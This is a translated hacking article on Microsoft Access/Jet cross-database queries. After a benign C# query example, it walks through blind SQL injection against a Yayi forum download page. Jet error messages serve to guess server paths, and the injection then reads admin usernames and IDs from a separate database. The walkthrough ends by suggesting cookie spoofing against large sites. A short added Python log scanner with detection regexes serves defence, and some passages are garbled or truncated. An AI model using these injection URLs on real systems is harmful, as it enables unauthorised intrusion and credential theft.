Do cross-database queries require absolute paths?

Source: Internet
Author: User

Let's talk about cross-database queries that do not need an absolute path.

Cross-database queries in ACCESS are written with a bracketed connection clause that carries the path of the other database and, if needed, its password. They are issued over an already-open Connection.

Problem description: sometimes the record set you need has to be assembled from related keys in two or three tables that live in different databases. An ordinary SQL query cannot do this, but the cross-database query feature of ACCESS can.

Solution: for example, the "admin" and "rain" tables are in different databases. The query is written as follows (a C# string; the path of the second database is built at run time from the application's base directory):

@"Select * from admin as a inner join [;database=" + AppDomain.CurrentDomain.BaseDirectory + "rain.zc].rain as B ON a.BH = B.LXBH"

SUPERHEI's note: the earlier "brute-force database" method relied on an absolute path; the cross-database technique discussed here is a little different from that discussion.

Cross-database queries of this kind seem to require the two databases to be in the same directory. If you look at this question you will see that a cross-database query can turn up a lot of information; unlike the earlier method, you do not have to wade through piles of English documents. Today I want to talk about a new cross-database query method I found some time ago, so listen carefully.

Take the following example, which Phantom Brigade and Gray Track discussed about a month ago:

http://www.target.com/show.asp?id=1 or 0<>(select count(*) from admin.c)

The following error message is displayed:

Microsoft JET Database Engine error 80004005
The file C:\WINNT\system32\admin.mdb is not found.

If you have read the learning report written by xhacker, this will get you excited, because the report vaguely mentions a vulnerability in ACCESS that amounts to a "Dir C: /s"! Let's continue and submit:

http://www.target.com/show.asp?id=1 or 0<>(select count(*) from c:\boot.ini)

Return Value:

Microsoft JET Database Engine error 80004005
File c:\boot.mdb is not found.

So a path can be placed in the part following FROM. To get a directory listing we would need cmd.exe, so try:

http://www.target.com/show.asp?id=1 or 0<>(select count(*) from c:\winnt\system32\cmd.exe.c)

Let's see the error message:

Microsoft JET Database Engine error 80004005
Unrecognized database format c:\winnt\system32\CMD.EXE.

It seems our hopes are dashed. (After repeated tests, the format of the file name following FROM turns out to be: filename.suffix.anyletter, which makes Jet open the file filename.suffix.) At this point it seems we can only determine whether a directory or a file exists. At the time I thought it was a "chicken-rib" vulnerability, of little real use, and many people likewise found it boring, which is a pity.

Later, one day I was checking the security of a friend's site, which ran the Yayi forum. First I tried the default database name and submitted:

However, because the database's extension is .asp, we still cannot download it. With no other way forward, I spent half a day digging through my hard drive and reading the original Yayi forum code, and the result was exciting. In the forum's download plug-in, the file down_list.asp contains this code:

If request("id") = "" then
    Response.write "You have not selected any software. Please go back"
    Response.end
End if
Set rs = server.createobject("adodb.recordset")
' request("id") is concatenated straight into the SQL string with no validation
SQL = "select Dclass.class, DNclass.Nclass, download.showname, download.classid, download.Nclassid, download.lasthits, download.downshow from download, Dclass, DNclass where download.classid = Dclass.classid and download.Nclassid = DNclass.Nclassid and download.id = " & request("id")

Look: the value of request("id") is spliced into the query statement without any filtering. We can do SQL injection! Easier said than done. Submit the following URL:

http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20admin)

The page returns normally, OK: the admin table exists. Next confirm the name of the column that stores the user name:

http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20admin%20where%20username)

That also succeeded, so the username column exists. Next check for the password column:

http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20admin%20where%20password)

An error. Fine, I was prepared for that; try again. In the end I tried every column name I could think of and none was right, and it was my turn to be depressed. I asked my friend whether he had modified the database; the answer was no. I opened the default database: there are two databases under the DATA directory, one named 1yabbs.asp (used by the forum) and one named download.asp (used by the download system). Opening the latter showed that it has no password column at all! It looked like the fun was over. Later, while chatting with a girl (MM), I suddenly thought of a way to use it (which shows I wasn't focused on the chat :). In SQL injection we sometimes use the form "admin.id", where admin is the table name and id the column name. So could we combine that with the chicken-rib vulnerability discussed above? Time to try it. Using the method described at the beginning, we first look for the WEB directory:

http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20c:\web\w.c.c)

The following information is returned:

Microsoft JET Database Engine error 80004005
C:\web\w.c is not a valid path. Check whether the path name is spelled correctly and whether you are connected to the server on which the file resides.
/Yabbs/down_list.asp, line 37

Wrong directory. Try the D drive:

http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20d:\web\w.c.c)


This prompt has changed:

Microsoft VBScript compilation error 8000a03f6
End missing
/IisHelp/common/500-100.asp, line 242
Microsoft JET Database Engine error 80004005
File d:\web\w.c not found.
/Yabbs/down_list.asp, line 37

This time the message says the file cannot be found, so the drive is right. Once the WEB directory is known, the rest is easy to guess. Submit again:

http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20d:\web\yabbs\data\yabbs.asp.c)

OK, this time I guessed the full path directly, and the response was exactly what I had in mind. Really ##@@ (I was excited for a good ten seconds ......)
The returned information is:

Microsoft VBScript compilation error 8000a03f6
End missing
/IisHelp/common/500-100.asp, line 242
Microsoft JET Database Engine error 80040e37
The Microsoft Jet database engine cannot find the input table or query 'c'. Make sure it exists and that its name is spelled correctly.

Now everything becomes simple. Submit query statements to determine the table and column names:

http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20d:\web\yabbs\data\yabbs.asp.admin%20where%20username)

If the page displays normally, the admin table and the username column exist in the database 1yabbs.asp. Next query the ID value by submitting the following URL:

http://www.target.com/yabbs/down_list.asp?id=1%20or%200<>(select%20count(*)%20from%20d:\web\yabbs\data\yabbs.asp.admin%20where%20id=1)

The page displays successfully. I don't need to say any more; everyone knows how to proceed from here. The rest is up to you.
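From the defender's side, every probe in this walkthrough leaves a distinctive signature in the web server log: a boolean "or 0<>(select count(*) ...)" clause, and a FROM clause naming a drive path (or a bracketed [;database= clause) instead of a table. The following is an added detection example, not code from the original article; the IIS-style log format, IP addresses and timestamps are constructed, and the two regular expressions are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style lines (not from the article):
# date time client-ip method uri query status
SAMPLE_LOG = """\
2004-03-01 10:00:01 10.0.0.5 GET /yabbs/down_list.asp id=12 200
2004-03-01 10:00:02 10.0.0.9 GET /show.asp id=1%20or%200<>(select%20count(*)%20from%20c:\\boot.ini) 500
2004-03-01 10:00:03 10.0.0.9 GET /yabbs/down_list.asp id=1%20or%200<>(select%20count(*)%20from%20d:\\web\\yabbs\\data\\yabbs.asp.admin%20where%20username) 200
2004-03-01 10:00:04 10.0.0.7 GET /yabbs/down_list.asp id=7 200
2004-03-01 10:00:05 10.0.0.11 GET /show.asp id=1%20or%200<>(select%20count(*)%20from%20[;database=d:\\web\\x.mdb].admin) 500
"""

# Jet accepts "<drive>:<path>.<ext>.<table>" or "[;database=<path>].<table>"
# after FROM; the article uses that to turn error text into a file oracle.
EXTERNAL_PATH_FROM = re.compile(
    r"\bfrom\s+(?:\[;database=|[a-z]:[\\/]?)", re.IGNORECASE)
# The blind boolean test used throughout: "... or 0<>(select count(*) ..."
BOOLEAN_PROBE = re.compile(
    r"\b(?:or|and)\s+\d+\s*<>\s*\(\s*select\s+count\s*\(\*\)", re.IGNORECASE)


def classify_query(raw_query):
    """Return the set of probe indicators found in one URL-encoded query string."""
    q = unquote_plus(raw_query)  # match on the decoded form the ASP page sees
    findings = set()
    if BOOLEAN_PROBE.search(q):
        findings.add("boolean-injection")
    if EXTERNAL_PATH_FROM.search(q):
        findings.add("jet-external-path")
    return findings


def scan_log(text):
    """Parse the constructed log format; return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # malformed or blank line, skip
        _date, _time, ip, _method, uri, query, status = parts
        tags = classify_query(query)
        if tags:
            alerts.append({"ip": ip, "uri": uri,
                           "status": int(status), "tags": sorted(tags)})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Note that both a 200 and a 500 response are flagged: the article's "page displays normally" case is the one that confirms a guess, so alerting only on errors would miss the successful probes. Disabling detailed ASP error messages to the client removes the path oracle but does not stop the blind boolean test, which is why the log check matters.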

What does the analysis above give us? Suppose you are facing a large site where you know the database name (for example, in my earlier article on the Dvbbs ("mobile network") forum database-exposure vulnerability, the database name of the forum is obtained), but the database cannot be downloaded and the program has no other known injection vulnerability. We can then use the SQL injection vulnerability of another program on the same site to run a cross-database query: first guess the WEB path, then query across databases to get the forum password, and then obtain front-end access through COOKIE spoofing. There are many places this can be used; explore them yourself. After all, to make someone else's technique your own, you have to extend their ideas and study them further.